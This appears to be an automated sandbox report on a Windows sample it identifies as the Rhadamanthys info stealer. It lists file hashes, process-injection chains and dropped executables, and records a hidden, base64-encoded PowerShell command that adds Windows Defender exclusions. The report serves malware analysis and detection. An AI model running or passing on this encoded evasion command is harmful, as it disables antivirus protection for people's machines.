Analysis
-
max time kernel
144s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
06-07-2024 18:00
Static task
static1
Behavioral task
behavioral1
Sample
zxcvb.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
zxcvb.exe
Resource
win10v2004-20240508-en
General
-
Target
zxcvb.exe
-
Size
5.4MB
-
MD5
a2a9c309c5300a53d2c2fc41b71b174b
-
SHA1
f6c26eae1925425fa8966266e87a57b688fad218
-
SHA256
7ccfae8644c3bc7439b88f2dc0de06bb5082de09b0bf5e143de17487ff252224
-
SHA512
a29eec8fa98174a74e9bd93c5902cdd95ce329ff8b7a1469901a95705dc1d7fffde58afa296399febb8559d8cd73c932945e85cce8af54e7a672d8f1618e3f7c
-
SSDEEP
98304:j+ddAtuMvY00V2vtQSH7OuqeGszSQTADu0mL63KQOKvYA1ZuoyQPNf+xKi:wdOuMvc8VdbOuqePmQTAKH63NYAiGfiT
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
zxcvb.exedescription pid process target process PID 1244 created 1196 1244 zxcvb.exe Explorer.EXE -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 8472 powershell.exe 1312 powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
BLueHvffhw.exeBLueHvffhw.exeFallbackBuffer.exeFallbackBuffer.exepid process 2104 BLueHvffhw.exe 3312 BLueHvffhw.exe 8728 FallbackBuffer.exe 4660 FallbackBuffer.exe -
Loads dropped DLL 2 IoCs
Processes:
zxcvb.exeBLueHvffhw.exepid process 1996 zxcvb.exe 2104 BLueHvffhw.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
zxcvb.exeBLueHvffhw.exeFallbackBuffer.exeFallbackBuffer.exeMSBuild.exedescription pid process target process PID 1996 set thread context of 1244 1996 zxcvb.exe zxcvb.exe PID 2104 set thread context of 3312 2104 BLueHvffhw.exe BLueHvffhw.exe PID 8728 set thread context of 4660 8728 FallbackBuffer.exe FallbackBuffer.exe PID 4660 set thread context of 3200 4660 FallbackBuffer.exe MSBuild.exe PID 3200 set thread context of 3604 3200 MSBuild.exe MSBuild.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
zxcvb.exedialer.exepowershell.exeFallbackBuffer.exepowershell.exepid process 1244 zxcvb.exe 1244 zxcvb.exe 264 dialer.exe 264 dialer.exe 264 dialer.exe 264 dialer.exe 8472 powershell.exe 4660 FallbackBuffer.exe 4660 FallbackBuffer.exe 1312 powershell.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
Processes:
zxcvb.exeBLueHvffhw.exeBLueHvffhw.exepowershell.exeFallbackBuffer.exeFallbackBuffer.exeMSBuild.exeMSBuild.exepowershell.exedescription pid process Token: SeDebugPrivilege 1996 zxcvb.exe Token: SeDebugPrivilege 1996 zxcvb.exe Token: SeDebugPrivilege 2104 BLueHvffhw.exe Token: SeDebugPrivilege 2104 BLueHvffhw.exe Token: SeDebugPrivilege 3312 BLueHvffhw.exe Token: SeDebugPrivilege 8472 powershell.exe Token: SeDebugPrivilege 8728 FallbackBuffer.exe Token: SeDebugPrivilege 8728 FallbackBuffer.exe Token: SeDebugPrivilege 4660 FallbackBuffer.exe Token: SeDebugPrivilege 3200 MSBuild.exe Token: SeDebugPrivilege 3200 MSBuild.exe Token: SeDebugPrivilege 3604 MSBuild.exe Token: SeDebugPrivilege 1312 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
zxcvb.exeBLueHvffhw.exezxcvb.exetaskeng.exetaskeng.exeFallbackBuffer.exeFallbackBuffer.exeMSBuild.exedescription pid process target process PID 1996 wrote to memory of 2104 1996 zxcvb.exe BLueHvffhw.exe PID 1996 wrote to memory of 2104 1996 zxcvb.exe BLueHvffhw.exe PID 1996 wrote to memory of 2104 1996 zxcvb.exe BLueHvffhw.exe PID 1996 wrote to memory of 2104 1996 zxcvb.exe BLueHvffhw.exe PID 1996 wrote to memory of 1244 1996 zxcvb.exe zxcvb.exe PID 1996 wrote to memory of 1244 1996 zxcvb.exe zxcvb.exe PID 1996 wrote to memory of 1244 1996 zxcvb.exe zxcvb.exe PID 1996 wrote to memory of 1244 1996 zxcvb.exe zxcvb.exe PID 1996 wrote to memory of 1244 1996 zxcvb.exe zxcvb.exe PID 1996 wrote to memory of 1244 1996 zxcvb.exe zxcvb.exe PID 1996 wrote to memory of 1244 1996 zxcvb.exe zxcvb.exe PID 1996 wrote to memory of 1244 1996 zxcvb.exe zxcvb.exe PID 1996 wrote to memory of 1244 1996 zxcvb.exe zxcvb.exe PID 2104 wrote to memory of 3312 2104 BLueHvffhw.exe BLueHvffhw.exe PID 2104 wrote to memory of 3312 2104 BLueHvffhw.exe BLueHvffhw.exe PID 2104 wrote to memory of 3312 2104 BLueHvffhw.exe BLueHvffhw.exe PID 2104 wrote to memory of 3312 2104 BLueHvffhw.exe BLueHvffhw.exe PID 2104 wrote to memory of 3312 2104 BLueHvffhw.exe BLueHvffhw.exe PID 2104 wrote to memory of 3312 2104 BLueHvffhw.exe BLueHvffhw.exe PID 2104 wrote to memory of 3312 2104 BLueHvffhw.exe BLueHvffhw.exe PID 2104 wrote to memory of 3312 2104 BLueHvffhw.exe BLueHvffhw.exe PID 2104 wrote to memory of 3312 2104 BLueHvffhw.exe BLueHvffhw.exe PID 1244 wrote to memory of 264 1244 zxcvb.exe dialer.exe PID 1244 wrote to memory of 264 1244 zxcvb.exe dialer.exe PID 1244 wrote to memory of 264 1244 zxcvb.exe dialer.exe PID 1244 wrote to memory of 264 1244 zxcvb.exe dialer.exe PID 1244 wrote to memory of 264 1244 zxcvb.exe dialer.exe PID 1244 wrote to memory of 264 1244 zxcvb.exe dialer.exe PID 8440 wrote to memory of 8472 8440 taskeng.exe powershell.exe PID 8440 wrote to memory of 8472 8440 taskeng.exe powershell.exe PID 8440 wrote to memory of 8472 8440 taskeng.exe powershell.exe PID 8696 wrote to memory of 8728 8696 taskeng.exe FallbackBuffer.exe PID 8696 wrote to memory of 8728 8696 taskeng.exe FallbackBuffer.exe PID 8696 wrote to memory of 8728 8696 taskeng.exe FallbackBuffer.exe PID 8696 wrote to memory of 8728 8696 taskeng.exe FallbackBuffer.exe PID 8728 wrote to memory of 4660 8728 FallbackBuffer.exe FallbackBuffer.exe PID 8728 wrote to memory of 4660 8728 FallbackBuffer.exe FallbackBuffer.exe PID 8728 wrote to memory of 4660 8728 FallbackBuffer.exe FallbackBuffer.exe PID 8728 wrote to memory of 4660 8728 FallbackBuffer.exe FallbackBuffer.exe PID 8728 wrote to memory of 4660 8728 FallbackBuffer.exe FallbackBuffer.exe PID 8728 wrote to memory of 4660 8728 FallbackBuffer.exe FallbackBuffer.exe PID 8728 wrote to memory of 4660 8728 FallbackBuffer.exe FallbackBuffer.exe PID 8728 wrote to memory of 4660 8728 FallbackBuffer.exe FallbackBuffer.exe PID 8728 wrote to memory of 4660 8728 FallbackBuffer.exe FallbackBuffer.exe PID 4660 wrote to memory of 3200 4660 FallbackBuffer.exe MSBuild.exe PID 4660 wrote to memory of 3200 4660 FallbackBuffer.exe MSBuild.exe PID 4660 wrote to memory of 3200 4660 FallbackBuffer.exe MSBuild.exe PID 4660 wrote to memory of 3200 4660 FallbackBuffer.exe MSBuild.exe PID 4660 wrote to memory of 3200 4660 FallbackBuffer.exe MSBuild.exe PID 4660 wrote to memory of 3200 4660 FallbackBuffer.exe MSBuild.exe PID 4660 wrote to memory of 3200 4660 FallbackBuffer.exe MSBuild.exe PID 4660 wrote to memory of 3200 4660 FallbackBuffer.exe MSBuild.exe PID 4660 wrote to memory of 3200 4660 FallbackBuffer.exe MSBuild.exe PID 3200 wrote to memory of 3604 3200 MSBuild.exe MSBuild.exe PID 3200 wrote to memory of 3604 3200 MSBuild.exe MSBuild.exe PID 3200 wrote to memory of 3604 3200 MSBuild.exe MSBuild.exe PID 3200 wrote to memory of 3604 3200 MSBuild.exe MSBuild.exe PID 3200 wrote to memory of 3604 3200 MSBuild.exe MSBuild.exe PID 3200 wrote to memory of 3604 3200 MSBuild.exe MSBuild.exe PID 3200 wrote to memory of 3604 3200 MSBuild.exe MSBuild.exe PID 3200 wrote to memory of 3604 3200 MSBuild.exe MSBuild.exe PID 3200 wrote to memory of 3604 3200 MSBuild.exe MSBuild.exe PID 8440 wrote to memory of 1312 8440 taskeng.exe powershell.exe PID 8440 wrote to memory of 1312 8440 taskeng.exe powershell.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1196
-
C:\Users\Admin\AppData\Local\Temp\zxcvb.exe"C:\Users\Admin\AppData\Local\Temp\zxcvb.exe"2⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe"C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe"C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3312 -
C:\Users\Admin\AppData\Local\Temp\zxcvb.exe"C:\Users\Admin\AppData\Local\Temp\zxcvb.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:264
-
C:\Windows\system32\taskeng.exetaskeng.exe {7ED42E75-DC6A-4A18-9690-12FE5D210704} S-1-5-21-1385883288-3042840365-2734249351-1000:RPXOCQRF\Admin:S4U:1⤵
- Suspicious use of WriteProcessMemory
PID:8440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAARgBhAGwAbABiAGEAYwBrAEIAdQBmAGYAZQByAC4AZQB4AGUAOwA=2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8472 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAARgBhAGwAbABiAGEAYwBrAEIAdQBmAGYAZQByAC4AZQB4AGUAOwA=2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
C:\Windows\system32\taskeng.exetaskeng.exe {2D8EE330-1397-4B90-ABF7-A55FC96EF05C} S-1-5-21-1385883288-3042840365-2734249351-1000:RPXOCQRF\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:8696 -
C:\Users\Admin\AppData\Local\Current\rraoen\FallbackBuffer.exeC:\Users\Admin\AppData\Local\Current\rraoen\FallbackBuffer.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:8728 -
C:\Users\Admin\AppData\Local\Current\rraoen\FallbackBuffer.exe"C:\Users\Admin\AppData\Local\Current\rraoen\FallbackBuffer.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe4⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3604
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e3d4fd3253eb448b43b288160e44778f
SHA1a302c38aaf97112ea3aef55fb15b04ab9d22819f
SHA2565f438c80fec53e2c655b59935ef78d1d739c727706d2eead93a482e1b3997cac
SHA51236e57d4946fd3e1d810dab50b636bf878e3c248d092001620233b3c1bf8ace064457b44fc03109f2221e8766a4af57e21106552de057ea0060316c347d1e34e1
-
Filesize
2.7MB
MD5abf2da5b3e7845f50463a72f8b6e6aaa
SHA1a5299f55950ca82134da73b9e9844c5d624114c3
SHA2562a4b1ae0ae67cd31f85680e6351bd5b92ff61e246c158decb1a43a3ef01d9f2c
SHA512570e8becd18b36d66a2ac295518c8ba3c0bc83d8a6175e601b509efd9237462d1d0826dbeb9e52465e7cdcd57cb4ae7fd859ddc4a5aad895cef6ef7fa981e8a4